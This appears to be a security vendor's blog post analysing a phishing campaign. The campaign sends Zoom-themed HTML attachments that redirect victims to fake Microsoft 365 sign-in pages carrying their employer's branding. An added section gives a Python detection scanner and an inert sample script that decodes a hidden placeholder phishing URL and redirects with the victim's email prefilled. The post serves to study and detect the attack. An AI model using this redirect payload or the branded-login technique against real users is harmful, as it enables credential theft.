On March 15th, 2023, a new feature released by Microsoft enabled organizations with a paid subscription to Microsoft 365 for business, Microsoft Dynamics CRM Online, Enterprise Mobility Suite, or other Microsoft services to add company branding to their Microsoft 365 sign-in page via Azure Active Directory.
This update is often recommended to improve both user experience and security by providing assurance the individual is logging in via the legitimate page for their company.
However, in July 2023, Egress Threat Intelligence analysts uncovered evidence that malicious actors are now using this customization in credential harvesting phishing attacks to improve credibility and increase the likelihood that the target will fall victim.
Quick attack summary
- Vector and Type: Email phishing, HTML attachments hyperlinked to phishing website
- Techniques: Brand impersonation, account compromise, credential harvesting
- Payloads: Attachment
- Targets: USA and UK
- Platform: Microsoft 365
- Bypassed SEG: Yes
How the credential harvesting attack plays out
What the Zoom impersonation phishing emails look like
The attack starts with a phishing email containing an HTML attachment. The example analyzed below was sent to an Egress employee. The attack impersonates videoconferencing provider Zoom, informing the target they have a voicemail.
While the email uses a stylized HTML template, with a well-rendered Zoom logo and company footer, it was sent from a compromised third-party account, hidden beneath the display name ‘no reply webmaster’.
The Egress Defend banners displayed in the image below show that the recipient has received communication from this email address before, as there is no banner labelling the email as from a ‘First Time Sender’. Further investigation revealed this earlier communication was another phishing email, so our analysts classified this as an account compromise attack within a third party, rather than a supply chain compromise attack (which requires a business relationship).
The email instructs the recipient to open the HTML attachment to listen to the message if they cannot access it via the hyperlink in the body copy. In reality, the hyperlink is a dummy and the only action the recipient can take is to open the attachment.
Screenshot showing Zoom impersonation email containing dummy hyperlink and malicious HTML attachment
Mailbox rendering of Zoom impersonation attack containing malicious HTML attachment and displaying Egress Defend anti-phishing banners
What the HTML payload looks like
As part of their investigation, our Threat Intelligence team examined the code within the HTML attachment, analyzing the redirect that is activated when the recipient opens it.
They discovered Egress’ legitimate company logo hosted on a malicious phishing website. Even to the trained eye, this looks like the real log-in page.
Screenshot showing URL for the malicious phishing website (partially blurred for security purposes) that displays a spoofed Microsoft 365 log in page with legitimate Egress branding
The malicious JavaScript within the HTML attachment is coded to perform two actions. When the victim opens the attachment, the credential harvesting webpage is loaded after a short delay. Simultaneously, the code automatically preloads the victim’s email address into the fake log-in panel, leaving only the password to be entered, and uses an HTTP GET request to copy the company’s branding onto the phishing webpage. All of this is completed in a matter of seconds.
Diagram of attack flow
On further investigation, the team saw the attack mirrored across other companies, with each payload redirecting the target to a similar credential harvesting website that used the organization’s logo as a spoofed customized log-in page.
Egress analysis: Using trust signals to socially engineer targets and HTML smuggling attacks
Manipulating trust for phishing success
This phishing campaign demonstrates two instances of subverting the target’s trust through social engineering. The cybercriminal uses a stylized HTML email template for their phishing email, impersonating the household brand Zoom.
In doing so, the cybercriminal hopes to use the ‘halo effect’ cognitive bias, leveraging the recipient’s trust in the brand to prompt them to open the attachment. Additionally, familiarity can often breed complacency, with people more likely to interact with brands they recognize or typically interact with.
Next, the cybercriminal uses the target’s employer brand to socially engineer them. Custom branding on log-in pages is often used to provide assurance that the end user is logging into the correct system and not falling victim to a cyberattack. The credential harvesting website renders the log-in page perfectly, making it harder for the target to spot. Preloading the victim’s email address into the fake log-in panel mimics the typical process an end-user experiences, while also making it easier for them by only requiring the password.
In addition, an organization’s own trust in Microsoft can also be subverted, as Microsoft 365 log-in pages can also be used to ‘map’ an organization to test which mailboxes on the domain are active. This tactic has been used for some time already, but chatter on darkweb forums, such as Dread, has recently surfaced to re-promote it.
HTML smuggling attacks
In an HTML smuggling attack, cybercriminals use HTML5 and JavaScript to create a highly evasive payload. Malicious scripts are coded within the attachment, ultimately enabling the cybercriminal to build malware behind an organization’s firewall or, as shown above, direct a user to interact with a phishing website.
The payloads are referred to as ‘smuggling attacks’, as they cannot be detected by traditional perimeter controls such as web proxies or email gateways, which look for malicious attachments or traffic based on signatures and patterns. Essentially, the payload is obfuscated behind seemingly benign HTML or JavaScript.
As a result, instances of HTML smuggling attacks have increased in the last year, with cybercriminals ‘leaning in’ on a successful tactic.
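The behaviours described above (a delayed redirect, a prefilled address, a decoded string hiding the destination, a request for remote branding) are exactly what a mail-flow triage step can look for in an HTML attachment before it reaches a mailbox. The following scorer is an added example for this write-up, not Egress code or the campaign’s payload; the sample attachment, its `.invalid` host and the indicator names are constructed for illustration.

```python
import base64
import re

# Pull inline <script> bodies out of the attachment (regex is enough for triage).
SCRIPT_RX = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.S | re.I)

# Behaviours the write-up attributes to the smuggled script, as indicators.
INDICATORS = {
    "delayed_redirect": re.compile(r"\bsetTimeout\s*\("),
    "navigation": re.compile(r"\blocation(?:\.href|\.replace|\.assign)?\s*[=(]"),
    "base64_decode": re.compile(r"\batob\s*\("),
    "remote_request": re.compile(r"\b(?:fetch|XMLHttpRequest)\b"),
    "embedded_email": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
}
B64_LITERAL = re.compile(r"""atob\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")


def decode_atob_literals(script):
    """Decode string literals passed straight to atob() so hidden URLs surface."""
    decoded = []
    for lit in B64_LITERAL.findall(script):
        try:
            decoded.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def scan_html_attachment(html):
    """Return indicator hits, decoded atob() literals and a verdict for one attachment."""
    scripts = SCRIPT_RX.findall(html)
    joined = "\n".join(scripts)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(joined))
    decoded = [url for s in scripts for url in decode_atob_literals(s)]
    # Delayed navigation combined with a prefilled address, obfuscated string or
    # remote request is the pattern described in the campaign.
    suspicious = {"delayed_redirect", "navigation"} <= set(hits) and len(hits) >= 3
    return {"hits": hits, "decoded": decoded, "suspicious": suspicious}


# Constructed, inert sample modelled on the described attachment; the host is a
# placeholder (.invalid TLD), not the real campaign URL.
_DEST_B64 = base64.b64encode(b"https://phishing-host.invalid/login").decode()
SAMPLE_ATTACHMENT = """<html><body><p>Loading voicemail...</p><script>
var hint = "user@example.invalid";
var dest = atob("__B64__");
setTimeout(function () { window.location.href = dest + "?login_hint=" + hint; }, 1500);
</script></body></html>""".replace("__B64__", _DEST_B64)
```

Running `scan_html_attachment(SAMPLE_ATTACHMENT)` flags the sample and surfaces the decoded destination, which is what an analyst wants to pivot on; a plain attachment with no navigation or decoding yields no hits.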
Detecting and preventing advanced phishing attacks
This attack demonstrates the importance of detecting and neutralizing phishing attacks before a recipient opens an attachment or clicks on a link. The perfectly rendered log-in page is difficult to spot as a credential harvesting site even to a highly trained eye, let alone a busy end-user who has only received periodic security training. Except for the URL, the page is identical to the legitimate log-in page.
This attack has been specifically designed to bypass traditional perimeter controls using advanced tactics and demonstrates the need for organizations to use an integrated cloud email security solution, like Egress Defend, that can detect social engineering within the content of the email body and obfuscated payloads, such as HTML smuggling attacks.